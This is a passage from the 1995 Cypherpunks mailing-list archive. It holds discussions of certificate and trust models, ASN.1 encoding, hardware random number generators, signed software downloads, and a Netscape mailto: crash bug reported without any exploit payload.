encoding (e.g., OBJECT IDs) is ludicrous.

>If you look at Verisign's DNs, or the text in my PGP keys, you'll see various
>ugly attempts at this.

I looked at your keys, just now, and see a whole bunch of keys but no
statements like:

"this person is allowed to withdraw money from bank account 017123 of xxx"
or
"this person is a trusted co-conspirator in the group called Cypherpunks"
or
anything else useful to me.

I tried adding an informative UserID to my key on the MIT server -- and
it came out as my primary ID.  ...big mistake..


>And then there's "WHICH person named Bill Stewart does this key belong to?"

Exactly.  Back to my point: the fact that you're named ``Bill Stewart'' and
are a person is probably important to you -- but if I'm accepting your
e-check, I don't give a damn about either.  What I care about is whether
the signature on the e-check (ie., the public key) is certified by the
bank.  In checking that authorization (attribute), I don't need to refer to
a person's name.  That's an irrelevant step in the process, brought on by
the way X.509 and PGP both define certificates.

>For the latter, I'm interested in solutions other than "Social Security Number",
>"Citizen-Unit Nationalized ID Card Number", etc.

Amen!

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHFF/lQXJENzYr45AQEMwQP8Dw1yd4vHzYGY57FpwWlWxquJLHsS3LrJ
tVYEEpCXu7/lGcHVd2o2KDeZHZy7r6qiQ7zo5eayFQlIkRPYjBmRzuvADwLisR7D
NK7l6dFVY2fA+SAmLiMtwz2VzsByZGB8HYw3joc+erNfmAmjeOLyVeg5pTaP9Rnu
/Xb2SWE4d14=
=WVyj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 3 Oct 95 07:23:49 PDT
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <Pine.SOL.3.91.951002225219.7461A-100000@chivalry>
Message-ID: <199510031423.KAA01406@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> On Tue, 3 Oct 1995, Perry E. Metzger wrote:
> > Radio signals can be interfered with or listened to -- never
> > underestimate the opponent. Computer interfaced radiation detectors,
> > in spite of Tim's claim to the contrary, are pretty cheap and very
> > hard to interfere with.
> 
> What about a beam of high intensity ionising radiation aimed at the 
> detector?

If you are paranoid, put the detector in a lead box and you are
done. Its not hard to get the lead thick enough that tampering
attempts would be noticed very easily. Trying to shield an object from
radio signals and still manage to get meaningful numbers out (rather
than self generated signal) is a hard problem, but this can be done by
a high school student.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 07:39:36 PDT
To: schampeo@imonics.com (Steven Champeon - Imonics Development)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <9510031355.AA18290@fugazi.imonics.com>
Message-ID: <199510031439.KAA13026@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Well, I'm still in Raleigh :-) but this doesn't do much of anything
> to my Macintosh, Netscape 1.1N, under System 7.5. Looks like a bug
> in your X server. However, Netscape 1.1N for Solaris, running under
> X11R6 X server, dumps core fairly quickly. I haven't had a chance
> to try out the 1.12 version on UNIX or Mac, but the 1.22 32-bit 
> Windoze version handles it fine under NT 3.5.1.

  Could someone try this on Solaris using 1.12?

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 3 Oct 95 07:44:55 PDT
To: cypherpunks@toad.com
Subject: Re: CISS TSP MISSI
Message-ID: <9510031443.AA11367@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I don't know which is more annoying:
	The silly 3/4K of Comments that the freezone remailer puts out.
	(The use constraints are useless to email recipients, after all); or

	That some anonymous bozo is posting open WWW data to cypherpunks.

I hope that the first, at least, can be fixed.

Avoid clutter; note the reply-to.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 3 Oct 95 07:57:18 PDT
To: ses@tipper.oit.unc.edu
Subject: Re: De Re ASN.1 and encoding rules ( was Re: X.509,...)
In-Reply-To: <Pine.SOL.3.91.951002141516.6137B-100000@chivalry>
Message-ID: <9510031453.AA22371@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


(my friend Tom is cc:'d as the Multics expert, re: the ref below)
-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 2 Oct 1995 17:13:21 -0700 (PDT)
>From: Simon Spero <ses@tipper.oit.unc.edu>

>Lets use 3DES as our example. We'll start with a naive specification:

[etc.]

You're starting down the same road I did in writing my example of how ASN.1
seduces you into bad design.  ..very good, but you stopped short.

[The PER sounds much better than BER -- but I've never seen PER before.  I
learned enough about ASN.1 to have decided it is a lost cause -- far easier
to let ASN.1 advocates talk to themselves while I go off to do something
independent and good.]

Back to the example.

>--
>LongLong ::= OCTET STRING (SIZE(8)) -- a long long is 8 bytes, er, long

Really?  There is an OCTET STRING (SIZE(8)) and you can make it a datatype?

I suppose you can make an OCTET STRING (SIZE(9)) too?

That can be really convenient.  You can have a tagged quantity (using the
top byte).  Alternatively, someone could define:

DesKey ::= SEQUENCE {
 encr BIT STRING (SIZE(1)), -- encrypt mode if 1, decrypt if 0
 value OCTET STRING (SIZE(8))
}

and now you can use DesKey as your data type with no bad effects and only
good ones (as far as the ASN.1 user is concerned).  Of course, the code to
pack/unpack just exploded.  So did the packet size (maybe, depending on
effort spent in pack/unpack) and so did the internal struct, probably.

[Truth in advertising: the example above is adapted from early Multics
where PL/I allowed you to do such nonsense and some programmer saw the
power of it -- so he used it in the file system, until he got caught.]

Lesson from this: there is a reason not to give a designer generality you
would not use in an actual implementation.

Anyway -- my example of ASN.1 abuse is along these lines but I won't
reproduce it here.  We can leave this as a parlor game for computer geeks.
:-)


>Here's the new definitions:
>
>--
>Long ::= OCTET STRING (SIZE(4))
>
>ThreeDes ::=SEQUENCE {
>	   IV SEQUENCE OF (SIZE(1..2) LONG,
>	   Key1 DesKey,
>	   Key2 DesKey OPTIONAL,
>	   Key3 DesKey OPTIONAL
>}

See -- ASN.1 is powerful in its seductiveness.  Even though you were trying
to convince me that it can be the same as my primitive example (and
therefore just as efficient), you couldn't resist using the power of the
generality to elaborate on the structure.

This is not a good feature of ASN.1.  This is its primary fault.  This is
why I call it a work of Satan.  (BER/DER helps in that evaluation, of
course).


>To be continued... (unless I get flamed off the list)

As I said, this could be a wonderful parlor game -- or list topic, if
people want to waste the time.  Think of it as the Crossword Puzzle page of
the cypherpunks on-line newspaper. :-)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHFNJFQXJENzYr45AQFV2AP9H1/A5bY4H8C/Ms3dhHIPOWiLCYhqLzFR
qKdvQaBYvPDCrr8jXLwQhTogvzu/9gkZ2DwnXVya7MxEpyy+1A5WrO3Jlqu+6Euy
bBcl1idhoomMzmzOga/F7YasXsFkoZoSqNYQKX/ZKcFvEuDGrzohlBNV5ubDEL7G
E3hdsak0f2Y=
=cjU/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 3 Oct 95 08:05:29 PDT
To: Simon Spero <cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <Pine.SOL.3.91.951002225219.7461A-100000@chivalry>
Message-ID: <9510031505.AA11622@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>What about a beam of high intensity ionising radiation aimed at the 
>detector? Since we're dealing with lo intensity sources, this could force
>the RNG into a small part of its range. Beware of black helicopters 
>carrying cyclotrons :-)

Thermal noise is a much less hazardous mechanism. Ionising radiation is a pain to deal 
with, it is something one generally attempts to get rid of in a fabrication process if 
possible. Environmental radiation is a strong polluting source.

There are plenty of other quantum phenomena which can be tapped. Essentially all one 
needs to do is to build a very high gain amplifier "baddly". The main difficulty is 
removing bias. One can either go through filtering hohaa or use say MD5. The trully 
paranoid could Xor together an odd number of  MD5 samples just in case there were bit 
pattern dependencies.

	Phill
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Tue, 3 Oct 95 08:22:11 PDT
To: rjc@clark.net
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <9510031521.AA18707@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From owner-cypherpunks@toad.com Tue Oct  3 11:07:33 1995
|   Subject: Re: New Netscape bug (in version 1.12)
|   Cc: rjc@clark.net, cypherpunks@toad.com
|   X-Mailer: ELM [version 2.4 PL24alpha3]
|   Content-Transfer-Encoding: 8bit
|   Sender: owner-cypherpunks@toad.com

Ray wrote, in reply to my message:

|   > 
|   > Well, I'm still in Raleigh :-) but this doesn't do much of anything
|   > to my Macintosh, Netscape 1.1N, under System 7.5. Looks like a bug
|   > in your X server. However, Netscape 1.1N for Solaris, running under
|   > X11R6 X server, dumps core fairly quickly. I haven't had a chance
|   > to try out the 1.12 version on UNIX or Mac, but the 1.22 32-bit 
|   > Windoze version handles it fine under NT 3.5.1.
|   
|     Could someone try this on Solaris using 1.12?

Just tried it, with two different mailhosts - the first gave the following
error:

	An error occurred sending mail:
	The "To:" header was invalid.

	Please check the email address(es) and try again.

The second accepted the mail. (?) Neither caused it to core dump, under
the X11R6 X server, Solaris 2.4, running Openwindows.

Cheers,

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@iafrica.com>
Date: Tue, 3 Oct 95 02:32:42 PDT
To: "Cancelmoose[tm]" <moose@cm.org>
Subject: IETF "Voluntary Access Control" working group
In-Reply-To: <199510012022.OAA07852@nag.cs.colorado.edu>
Message-ID: <Pine.NEB.3.91.951003111132.28641d-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> It would make a great project if a bunch of cypherpunks installed
> NoCeM and then piped the list to a newsgroup.  We could then develop
> reputation servers to help us use NoCeM, start charging cyberbucks for
> our recommendations, and, in short, make cpunks into a slightly larger
> outpost in Cyberlibertaria. (a.k.a. The Free Net)

The IETF "Voluntary Access Control" working group could probably use a few
more people who are interested in the type of access control enabled by
reputation servers, as opposed to the type of access control imposed by
censorship servers.  Subscribe to the mailing list via
vac-wg-request@naic.nasa.gov. 

--apb (Alan Barrett)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Oct 95 11:37:47 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Certificate proposal
Message-ID: <199510031838.LAA27571@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 10/3/95 EDT, Carl Ellison <cme@TIS.COM> wrote:
>The whole issue of CRLs is on shaky ground with me.  I think it's gotten
>lost in debates about how to distribute them offline (or perhaps via
>e-mail) and have them work.
No surprise; it's a tough job.  I don't expect my laptop to be
continuously on-line when I'm reading mail, and even on-line use
needs to be more realistic than saying "Everybody must use X.400".

>CRLs are like the old credit card or check stop lists which used to be at
>every supermarket checkout station.  They aren't there any more.
>Checkout stations are now on-line.
>I see nothing wrong with having a "certificate" which says ``certificate
>available online only at xxx@yyy.zzz''.

Interesting.  Aside from the excessive cost of looking up cards in paper
booklets,
which can be avoided by having checkstands validate on the store's backroom
computer system, on-line verification lets the card company not only
refuse stolen cards, but also dynamically refuse cards that have reached
their credit limits, which you can't do on a slow push-based offline system.

However, it's _very_ tough to spoof a credit-card verification system, 
because the checkout device uses phones or private networks to reach the 
authorization company, so the response that comes back saying yes/no/stolen
can be real dumb.  On the internet, the response needs to be signed,
though I suppose it could say "Key sssss at xxx@yyy.zzz authorized
key uuuuu today yyyy/mm/dd/hh:mm:ss, valid for up to $500", and you'd then have
to validate the key that signed it, etc....  On the other hand, you could
have the cert require multiple confirmations, e.g. both the bank and the
user have to authorize this use.

>>3) Neither PGP nor X.509 (as documented in the RFC1422 and PKCS#6) have any
>>	   mechanism for additional information other than cramming it into
>>	   the username, but supposedly X.509 Version 3 includes something?
>Yup -- and it's ugly.  It counts on a defined OBJECT ID to define the

OBJECT IDs solve two problems - one is that you need some kind of format (yuk),
but the other is that fields to have mutually agreed on values to be meaningful,
and central registration is an easy way to implement it, as long as there's
a simple way to register things.  I hope it at least supports an OBJECTID
with parameters, e.g. "CreditLimitUSDollarsBankFoo integer"  rather than needing
excessively many OBJECTIDs "CreditLimit3700USDollarsBankFoo"?  As you say below,
there's certainly no need to use ASN.1 formats instead of readable ones...

> What's invalid is the assumption that
>there must be a relationship (or even a person) in physical space *before*
>one can have a relationship (or a person) in cyberspace.

Yeah.  I've decided, as an experiment, to start signing keys for pseudonyms,
though I haven't settled on how to deal with unauthenticated signatures
for realspace people (in the one case where I've been asked, the person
didn't have any independent signatures from other people, so so far I've
declined,
but I may re-evaluate and just do uniqueness.)

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 3 Oct 95 09:48:32 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030836.EAA09080@clark.net>
Message-ID: <Pine.SUN.3.90.951003114512.29696A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


This bug does not crash Netscape 1.1S running on an SGI.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 3 Oct 1995, Ray Cromwell wrote:

> Date: Tue, 3 Oct 1995 04:36:44 -0400 (EDT)
> From: Ray Cromwell <rjc@clark.net>
> To: cypherpunks@toad.com
> Subject: New Netscape bug (in version 1.12)
> 
> 
> C'punks, 
>   I just got back from a vacation in Raleigh, and downloaded the
> new "fixed" Netscape 1.12. It took me about an hour, but I've
> discovered another bug and potential security hole. This one relates
> to mailto:.
> 
>   The bug is as follows. Create a HTML file with a hyperlink containing
> the following URL
> 
>  foo 
> 
> This bug doesn't seem to crash Netscape, instead, it crashes my XServer
> as soon as the mail window pops op. I'm too tired right now to try to
> analyze it, but it might be another stack bug, this time, in the X
> libraries because Netscape isn't doing any sanity checking.
> 
> I need help testing this bug on other platforms. I have created
> a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> to test.
> 
> I have also found 2 other bugs that cause stack trashing in v1.1
> however, they are random and I haven't been able to isolate them
> completely yet. (I have created a page on my system, such that if you
> visit it, after you visit about 3 more pages, it crashes)
> 
> What's my point in pursuing this? Netscape's browser is a piece of
> software that runs on millions of computers and in effect, allows
> outside agents to input arbitrary data into that software. As such,
> it is unlike most applications made. Sure, Microsoft Word may have bugs,
> but how many people are downloading hundreds of MS Word documents
> everyday and viewing them? Users of Web browsers are exposing themselves
> like this everyday, and so I think, that web browsers must have higher
> standards of robustness.
> 
> 
> I think Netscape represents an enormous risk to computer security,
> and while I think they are heading in the right direction, there are
> some very basic implementation issues they need to clear up which are
> orthogonal to SSL and credit card transactions. All the cryptography
> in the world won't help you if someone can subvert your cryptobox.
> Netscape needs to do some serious quality assurance work. I've never
> been a QA person in my life, but within a few minutes, I have been
> able to find serious bugs in the software. And while I'm sure
> Netscape's coders are fine people, proof reading your own code,
> code that you look at everyday, becomes rather hard because you
> tend to "see through it". (just like proof reading essays, or messages)
> I think Netscape should hire some outside firm/group to review their
> code under non-disclosure for potential implementation holes.
> 
> -Ray Cromwell <rjc@clark.net>
> P.S. I am running Netscape v1.12 under BSDI2.0 and the XAccel/2.0 server
> 
> 
>  
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Ramirez <mrami@mramirez.sy.yale.edu>
Date: Tue, 3 Oct 95 09:20:11 PDT
To: sameer <sameer@c2.org>
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030840.BAA04677@infinity.c2.org>
Message-ID: <Pine.BSF.3.91.951003121902.8709B-100000@mramirez.sy.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Oct 1995, sameer wrote:

> 	Doesn't crash on SunOS 4.1.3_U1 running X11R6.

Nor does it crash FreeBSD 2.1-STABLE w/ X11R6

> > I need help testing this bug on other platforms. I have created
> > a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> > to test.
> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:	 510-601-9734
> An Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org (or login as "guest")			sameer@c2.org
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Tue, 3 Oct 95 13:24:28 PDT
To: cypherpunks@toad.com
Subject: Oct 14 DC-area physical meeting
Message-ID: <199510032024.NAA29838@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to send this to 800+ folks, this is the only announcement I'll
send this month.

The October DC-area cypherpunks meeting will be on Saturday, Oct. 14
at 3:00 PM at the Digital Express offices in Laurel.
For more information (directions, agenda, etc.), please see url:
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

Additional agenda topics solicited!

Thanks
Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Oct 95 13:39:48 PDT
To: cypherpunks@toad.com
Subject: Monkeywrenching Certificate Schemes
Message-ID: <ac96ebe0120210043a20@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:15 PM 10/3/95, Carl Ellison wrote:

>Yup.  Verisign is probably going to fight hard to keep their certificate
>model.  On top of them, there's the US Postal Service and a few others,
>fighting over the chance to set up a certificate hierarchy.

Almost needless to say, there is nothing particularly wrong with
certificate-granting agencies. A big caveat: Providing the process is fully
voluntary.

(I'm not addressing issues of implementation, of the "X.509" messinesses, etc.)

The big danger I see in all this talk of "certificate authorities" is that
it won't be a voluntary process. (The same themes as with key escrow.)

I'm not suggesting we waste our time arguing against such certificate
authorities. Rather, we might better spend our time finding ways to
monkeywrench the proposals.

I don't want either the "Postal Service" or "Verisign" given the authority
to approve or disapprove my identity or any identity I may choose to adopt.

Isn't it about time for SAIC to acquire Verisign?

--Tim May (Identity Subject to Approval)



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Tue, 3 Oct 95 14:07:15 PDT
To: Laurent Demailly <jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510030147.AA15570@dmsd.com>
Message-ID: <9510031403.ZM151@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Oct 3,  6:19pm, Laurent Demailly wrote:
> Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was R
> 
> [ text/plain
>   Encoded with "quoted-printable" ] :
Jeff Weinstein writes:
>  > In article <9510030248.AA08909@hplyot.obspm.fr>, dl@hplyot.obspm.fr 
(Laurent Demailly) writes:
>  > > I asked monthes ago netscape folks to make md5sum and/or PGP digital
>  > > signatures (preferably md5sum of each files, this in a file, itself
>  > > pgp signed) of the binaries available on their page and on relevant 
>  > > newsgroup to reduce possibility of tempering.
> [...]
>  >   I've been thinking about this recently for obvious reasons.  My concern
>  > is that if someone can attack your download of netscape, they could also
>  > attack your download of the program that validates netscape.  Is there
>  > really any way out of this one?
> I have *already* downloaded, checked,... pgp years ago, and I did
> multiplatforms cross tests,... so all I need is a pgp signed stuff
> (obviously i need your (netscape's) pgp public key too, but I think
> that a "massive" distribution, that is : mail on a couple of mailing
> lists, your site, newsgroup, eventually adding fingerprint by phone
> for the paranoid, would ensure that your key is indeed your key (it
> can probably take few weeks before it's "sure" (you'll get feedback if
> key have been tempered somehow) 
> Or easiest even manage that your key is signed by some well known folk
> (PhilZ,...))
> 
> See my point ?

  Yes, I get the idea about spewing the signed hashes everywhere.  The
problem I have is with the user of PGP.  That will help cypherpunks,
but does absolutely nothing for most of our millions of users, who
have no idea what PGP is.  Perhaps its enough to assume that if anyone
is tampering with the distribution, some cypherpunk will stumble across
it...

	--Jeff


-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Olivier GALIBERT <Olivier.Galibert@mines.u-nancy.fr>
Date: Tue, 3 Oct 95 06:20:28 PDT
To: akjoele@ee.siue.edu (Arve Kjoelen)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510031259.HAA01229@shiva.ee.siue.edu>
Message-ID: <199510031312.OAA18079@mines.u-nancy.fr>
MIME-Version: 1.0
Content-Type: text/plain


> 
> It doesn't crash Solaris 2.4 running X11R5 (Netscape 1.1N)
> 
> > I need help testing this bug on other platforms. I have created
> > a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> > to test.

I doesn't crash on SunOS 4.1.3_U1/NCD X Terminal either, but the
way the "Mail To" field is written is funny (three lines of x's
on the same horizontal line with 2pix horz. spacing :-).

  Sarayan



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 3 Oct 95 12:24:19 PDT
To: stewarts@ix.netcom.com
Subject: Re: X.509, S/MIME, and evolution of PGP
In-Reply-To: <199510031837.LAA27564@ix2.ix.netcom.com>
Message-ID: <9510031915.AA13386@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 03 Oct 1995 11:37:22 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>

>At 10:24 AM 10/3/95 EDT, Carl Ellison <cme@TIS.COM> wrote:
>>I hear you but I object.
>>Going along with the majority may be the fastest way to get a result out
>>but it's morally wrong.
>
>A zillion and a half people are about to get the next version of Netscape,
>which uses X.509 certificates, and they can get free Verisign personna
>certificates to go with them; stores can get inexpensive ones.
>They will use this for secure email, like it or not,
>and as they discover the need for better certification (when there's
>money involved), they'll go get it.  Wherever they can.

Yup.  Verisign is probably going to fight hard to keep their certificate
model.  On top of them, there's the US Postal Service and a few others,
fighting over the chance to set up a certificate hierarchy.

The whole world is thinking of physical people and of tying things to those
people.  They think of names as the only handle on (pointer to) people.
...so they see certificates as right and proper.  We need to show them a
better way.  (Tie attributes through the key to the person -- not through
the person to the key.)

>The question is, will they get a Web of Trust model from us,
>or will they stick to the hierarchical model?  

As several have pointed out, a certificate structure (X.509, PGP or mine)
can be used in a hierarchy, if you want it, or not if you don't.  We don't
care.  What I care about is that a signed thing (one link in a chain of
assertions) speak directly to what it is signing ("this key is good for
_________") or ("the person who demonstrated to me that he knew the private
key for this key has red hair and wore glasses") -- rather than try to
sidle up to existing people structures (by tying to names of people) and
then, on discovering that the people-structures aren't as strong as the
digital signatures, make the people structures stronger (e.g., by unique ID
number on a national ID card, with thumbprints for verification).

>						If we get something
>halfway decent out there, fast enough, ideally with support
>or toleration from Netscape, people will at least have distributed trust
>models in their worldview, and will insist that the tools they use and
>build around it be compatible.  Otherwise, almost all of them _will_ be
>using the hierarchical-only structure, and the next big Internet application
>that
>needs security will latch onto the now-big software base, and may not
>be as decent as Netscape about the trust models they accept.

Yes -- I agree.  We should get cracking on this.

>If you can define a better relational trust model than the Web stuff,
>fast enough to avoid this, great!  Go for it.  But it'll be much easier
>to get something like that adopted in a non-hierarchical world than in
>a world of Drivers' Licenses on the Information Superhypeway. 

I'm still talking web of trust -- only I'm removing the person's name (or
e-mail address) as a link between the assertion and the key.

Haven't I described this well enough?  Do I need to write it up in more
detail?


How about some analogies?

I could have a driver's license (giving my name and address), a piece of
paper saying that I (at my address) own bank account number 01732 at First
Security Bank, and a certificate from Verisign also giving my name and
address.  This ties my public key to my driver's license (assuming I'm the
only Carl Ellison at my address (which I wasn't, as a kid) and that I don't
move).

Alternatively, I can have First Security Bank open account 01732 for me and
create a certificate binding my public key to that account number.  Now, I
can use that key to sign anonymous checks.  (The bank knows me, perhaps,
but the payee doesn't need to.)  To tie my name to the public key, I sign
my own certificate saying ``The person who knows the private key for
61E2DE7FCB9D7984E9C8048BA63221A2 goes by the name "Carl Ellison" and
receives mail at "cme@acm.org".''  I don't need anyone else to attest to
the validity of that statement because it's uni-directional (from key to my
name), not the other way.  It's only the other assertion direction which
requires some witnesses to attest to validity, because the name is not
capable of doing a digital signature without a key.  [That is, if you were
to go the other direction (which is what X.509 or PGP try to do), you need
to sign a key with a name (DN or UserID).  You can't sign with a DN or
UserID.  You can sign with a key.  So, you have to fall back on human
witnesses to use their keys to sign in place of the name (DN or UserID) and
you have to decide how to trust those witnesses.  If you reverse the arrow
of assertion, this particular problem goes away.]

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHGLpVQXJENzYr45AQFS2QQAidMwZMBbv2ap2S4ZNVIWfZO6/W1FHOaw
GZYHQk38o0qD5YOrth1Hab2IiyuvLtBG38hHJ8aZf3NsvzswSvNExuBQy+eLns8m
ZcM2B4qPMRWOP1XMmAPaoaknRTmonKP/acO4KcKIR0K+x+n1DNwTwyDx4LbRjOnn
hHp3fFfD7iI=
=Fccl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 3 Oct 95 12:44:41 PDT
To: stewarts@ix.netcom.com
Subject: Re: Certificate proposal
In-Reply-To: <199510031838.LAA27571@ix2.ix.netcom.com>
Message-ID: <9510031923.AA14118@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 03 Oct 1995 11:37:26 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>

>However, it's _very_ tough to spoof a credit-card verification system, 
>because the checkout device uses phones or private networks to reach the 
>authorization company, so the response that comes back saying yes/no/stolen
>can be real dumb.  On the internet, the response needs to be signed,
>though I suppose it could say "Key sssss at xxx@yyy.zzz authorized
>key uuuuu today yyyy/mm/dd/hh:mm:ss, valid for up to $500", and you'd then have
>to validate the key that signed it, etc....  On the other hand, you could
>have the cert require multiple confirmations, e.g. both the bank and the
>user have to authorize this use.

The response does *not* need to be signed.  If you want rock solid
authentication which you can save for later use in court (e.g., buying an
airplane?), you might insist on a digital signature.  However, all you need
is for the path from the person who knows (AmEx's computer) to your cash
register to be trusted.  There are lots of ways to establish trust.

E.g., you could encrypt the path with a session key (triple-DES) chosen by
the cash register and sent at the beginning of the day to AmEx using AmEx's
public key.  Now anything coming back under that symmetric key is
effectively authenticated.

>>>3) Neither PGP nor X.509 (as documented in the RFC1422 and PKCS#6) have any
>>>	   mechanism for additional information other than cramming it into
>>>	   the username, but supposedly X.509 Version 3 includes something?
>>Yup -- and it's ugly.  It counts on a defined OBJECT ID to define the
>
>OBJECT IDs solve two problems - one is that you need some kind of format (yuk),
>but the other is that fields to have mutually agreed on values to be meaningful,
>and central registration is an easy way to implement it, as long as there's
>a simple way to register things.  I hope it at least supports an OBJECTID
>with parameters, e.g. "CreditLimitUSDollarsBankFoo integer"  rather than needing
>excessively many OBJECTIDs "CreditLimit3700USDollarsBankFoo"?  As you say below,
>there's certainly no need to use ASN.1 formats instead of readable ones...

OBJECT IDs are by no means even a sensible way to achieve this end.  SMTP's
tags work very nicely, thank you, and they allow people to define their own
for private-joke extensions to the protocol.  (I did just that for e-mail
access to the TIS DRC.)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
